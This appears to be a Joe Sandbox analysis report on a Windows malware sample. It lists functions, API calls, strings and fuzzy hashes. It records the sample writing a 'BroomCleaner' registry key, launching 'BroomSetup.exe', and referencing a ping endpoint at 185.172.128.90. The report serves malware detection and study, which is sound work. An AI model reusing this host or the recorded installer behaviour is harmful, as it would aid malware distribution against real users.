Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
Instruction ID: 5487a5d46cc6b628b64d0aabb319d5eb223523a794a7473b7ec3082598feaf8f
Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
Instruction Fuzzy Hash: E2E04F31101504ABCF116F14DD08A9A3B29FF04386F454029F84656131CF39DE83CA48

Uniqueness

Uniqueness Score: -1.00%

Function 043AD8CE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 043AD8F6
Module32First.KERNEL32(00000000,00000224), ref: 043AD916

Memory Dump Source

Source File: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 043AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43ad000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 8520555cad887eb3cdf6967193df9b76921b12ceab778541ab1f412e13652efb
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E1F0F6361403146FE7203BF5B88CBAE72EDEF48728F101529E642D18C0CB70F8454A61

Uniqueness

Uniqueness Score: -1.00%

Function 0041A36B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A039: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056

GetLastError.KERNEL32 ref: 0041A47F
__dosmaperr.LIBCMT ref: 0041A486
GetFileType.KERNEL32(00000000), ref: 0041A492
GetLastError.KERNEL32 ref: 0041A49C
__dosmaperr.LIBCMT ref: 0041A4A5
CloseHandle.KERNEL32(00000000), ref: 0041A4C5
CloseHandle.KERNEL32(?), ref: 0041A60F
GetLastError.KERNEL32 ref: 0041A641
__dosmaperr.LIBCMT ref: 0041A648

Strings

H, xrefs: 0041A5CD

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
Instruction ID: 1a6929838056931ddf07ca16ed76f5c23edfa2113b557bae9411180e0ac2dad7
Opcode Fuzzy Hash: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
Instruction Fuzzy Hash: DAA13632A041188FDF19DF68D8517EE7BA1AF06324F14015EEC51EB391DB398DA2CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
Instruction ID: 1de375e9a44cfea9a4e980cda881e291b4907b82d4d6a27c77cd479f01cc8893
Opcode Fuzzy Hash: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
Instruction Fuzzy Hash: BCC12B71E04249AFDB11CFA9C851BEE7BB1BF19314F04019AE854B7392C7789D81CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0432003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0432024D

Strings

kernel32.dll, xrefs: 0432008F, 04320095
cess, xrefs: 0432018D

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 8fc00c82f1891b7f5f8bb86eb48b051110fedef5e2ffd93aa1dfb37096590c2f
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 17526A74A01229DFDB64CF58C984BACBBB5BF09304F1480D9E94DAB351DB30AA89DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0042612F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00426134
RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 0042615C
RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 004261DF
RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426200

Strings

Installed, xrefs: 0042613E, 0042616C, 0042618B, 0042618C
SOFTWARE\BroomCleaner, xrefs: 0042613C, 0042614F

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 27de81f89804b0a0673715e13edf5a13659c602b223520dd733241f70ea5ab76
Instruction ID: 58fc235232bf4dd8c125a8bac87f810df134f3da6f2bb4c7cb0ac5f6772b16af
Opcode Fuzzy Hash: 27de81f89804b0a0673715e13edf5a13659c602b223520dd733241f70ea5ab76
Instruction Fuzzy Hash: 47319A71A00229AFDF149FA8DC949FEBB79FB48358F44412EE802B7291C7B55E05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00426260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?,/BroomSetup.exe), ref: 004262A2
WaitForSingleObject.KERNEL32(?,00008000), ref: 004262B6
CloseHandle.KERNEL32(?), ref: 004262BF

Strings

/BroomSetup.exe, xrefs: 0042626B

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: /BroomSetup.exe
API String ID: 3837156514-1897133622
Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
Instruction ID: f0609d10c970eb56ece5b35627df0b7ec36997a903e398cb54ca8c4de5c5ad66
Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
Instruction Fuzzy Hash: 66017C31E00218EBDF25EF69E9459DDBBB8EF08310F41812AF805A6260EB709A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 00416453
GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 0041645D
__dosmaperr.LIBCMT ref: 00416488

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
Instruction ID: aa9397e3c223395acf83e04721932d84fcb93a289d6ab5d19588dbc87750978f
Opcode Fuzzy Hash: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
Instruction Fuzzy Hash: 4F016B33A101201AD6355675A8457FF2B494B82B38F27016FFC18972D1DF6CDCC6469D

Uniqueness

Uniqueness Score: -1.00%

Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
__dosmaperr.LIBCMT ref: 004197B1

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
Instruction ID: aba61adf325f610bb64cc2fd6d97dc3a8945be917003060b225fa659b6e0b810
Opcode Fuzzy Hash: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
Instruction Fuzzy Hash: 8E012D37B20119ABCB159F99DC059EE7B19DF85330B28024EFC21972D0EA749C918798

Uniqueness

Uniqueness Score: -1.00%

Function 00426217 Relevance: 4.5, APIs: 3, Instructions: 35
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID:
API String ID: 3805958096-0
Opcode ID: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
Instruction ID: 926e9ac1e5f1aba45008a0d26bda579428ca80e0843417663d772dc166ed892d
Opcode Fuzzy Hash: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
Instruction Fuzzy Hash: 73E06572701120BBD7351B99AC48FABBE6DEF856F0F050169FB01E21109A61DC0197B4

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081

Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

v*@, xrefs: 00401BD0

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
String ID: v*@
API String ID: 3966877926-3062513736
Opcode ID: b206c63552d3cfde46f7048d87b5e92c7bdaa8cdd7915c41a842bf4ae9388a12
Instruction ID: b9e6d0c04dc114dbe46ca1cb3692bd7dbb1da951860286197dc681cf7a8c4379
Opcode Fuzzy Hash: b206c63552d3cfde46f7048d87b5e92c7bdaa8cdd7915c41a842bf4ae9388a12
Instruction Fuzzy Hash: E82190B1711206AFD708DF59C889A6AF7F9FF48348F14826EE115A7341C7B8DE008B94

Uniqueness

Uniqueness Score: -1.00%

Function 00425EE2 Relevance: 3.1, APIs: 2, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00425EE7

Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 420165198-0
Opcode ID: c9a2dfee6a5dc0c00aeaf27a507da7a8fac60e2bd9c285666c44caec7eae5a08
Instruction ID: 8b308e217030a11e536693c7e770bb36c60ea871e1947f1e620e0115d8c257f2
Opcode Fuzzy Hash: c9a2dfee6a5dc0c00aeaf27a507da7a8fac60e2bd9c285666c44caec7eae5a08
Instruction Fuzzy Hash: 3B311570D01119EBDB14EF95E985AEDFBB4BF48304F1080AEE805B3681EB786A04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 04320E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(00000400,?,?,04320223,?,?), ref: 04320E19
SetErrorMode.KERNEL32(00000000,?,?,04320223,?,?), ref: 04320E1E

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: fd19119ecc66135e58e8f0a75be676a6736d9e7f2bb82d6b6bf4c37b2cce7ee0
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 12D0123114512877D7402A94DC09BCD7B2CDF05B62F008011FB0DD9080C770954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
Instruction ID: d77f3fb4a2dea80d7e26f58f35abdac3f7963be9eaf0666b1d936bf3e200b83d
Opcode Fuzzy Hash: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
Instruction Fuzzy Hash: 11510771A00108AFDB10DF29C840BFA7BA1EF85364F19815EE8489B392CB39DD82C759

Uniqueness

Uniqueness Score: -1.00%

Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00402008

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
Instruction ID: 0bde1253143090ae73d8540e9fd285f072e0ff93183f3a7406587cf81db67a05
Opcode Fuzzy Hash: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
Instruction Fuzzy Hash: CF316B31604706AFC710DE29C884A5ABBA0BF88354F04863EF954A73A1D779D854CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004024A6

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: Exception@8H_prologThrowstd::system_error::system_error
String ID:
API String ID: 938716162-0
Opcode ID: 540de7721727b4ca24ecd9efb376f8aeec338981f0a8d92e2b0ead1ad3aa5908
Instruction ID: 51a424f7f6e89c6a531f911fc24cb136489b0386115aa572e9e255c0d5409117
Opcode Fuzzy Hash: 540de7721727b4ca24ecd9efb376f8aeec338981f0a8d92e2b0ead1ad3aa5908
Instruction Fuzzy Hash: B9318B71A00505AFCB18DF69C9D5E6AB7F5FF84318718C16EE416AB791C634EC40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402581

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b880830fb10006c245270c451b658a342de933d97101c235293ed34406791828
Instruction ID: 5794e906f2440793f0f111a630642e31dc7bb6ced8b38f44c89e924cf631a0c7
Opcode Fuzzy Hash: b880830fb10006c245270c451b658a342de933d97101c235293ed34406791828
Instruction Fuzzy Hash: 87318770A00615AFCB15DF09CA84A9ABBB1FF48314F14856EE405AB791C7B9ED40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402408

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d6c6d0674046824ae49e356bd95e2b3b32d4d687766b11b914c442daf499c3b2
Instruction ID: 4e0495d31301cfc09fe992fc8428b3d42591f74c8e771436201b91ad316d0700
Opcode Fuzzy Hash: d6c6d0674046824ae49e356bd95e2b3b32d4d687766b11b914c442daf499c3b2
Instruction Fuzzy Hash: 9D217C70601611DFC728DF19C54896ABBF5FF88314B20C26DE85A9B7A1C774AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00403A42 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403A47

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 94d41c902baa54b1b7ab3027f5a178ce52665b7b455d6233b737f42a58ba5fa1
Instruction ID: ebd396bbc56fc5044348258bf57d62a6d48641e9a3723b70d5712ae04e929cd2
Opcode Fuzzy Hash: 94d41c902baa54b1b7ab3027f5a178ce52665b7b455d6233b737f42a58ba5fa1
Instruction Fuzzy Hash: 9511D031A042048ECB04DFA9C895BEEBFB4BF44314F08812ED8417B2C2D7789A45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFF9 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0041B037

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
Instruction ID: 62b4485d732ad4ebc0017ff3881fb56af0f069673ee8f9cf524c42d6b5156d4d
Opcode Fuzzy Hash: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
Instruction Fuzzy Hash: 6911367590410AAFCB05DF98E9419EB7BF4EF48314F0040AAF819AB311D631E9618BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
Opcode Fuzzy Hash: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3585332825-0
Opcode ID: 9e5b33f735e5741d3742e5114604eb84fbebb543a0d7af76fa80b020808a8594
Instruction ID: 4123f54f6db546b52d5441bf0cc69889d4086bdab9222fcc4d2dc13d92cadc12
Opcode Fuzzy Hash: 9e5b33f735e5741d3742e5114604eb84fbebb543a0d7af76fa80b020808a8594
Instruction Fuzzy Hash: 32018F70610114AFDB14DB65CA0ABAEB3F9AF44708F00403EF405B76D1DBF8AE408B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2FA Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041A33B

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
Instruction ID: b492b302e4735b3d70b5ef79ffcf6f17a9fdb10017537b69176e17197afc0c8a
Opcode Fuzzy Hash: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
Instruction Fuzzy Hash: 6DF09A3251111CBBCF015E96DC01DDA3B6EEF89324F100256FD2492050DA3ACA61ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
Instruction ID: dd4a480e522f73ad3d9a6edd52b828d095e0909c103fd04d4038ae70eb088b48
Opcode Fuzzy Hash: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
Instruction Fuzzy Hash: 35E0A03128822557972026629C00BDF6A69AF417E0B150223BC0496290CA5C8BD182AD

Uniqueness

Uniqueness Score: -1.00%

Function 00409256 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00409967

Memory Dump Source

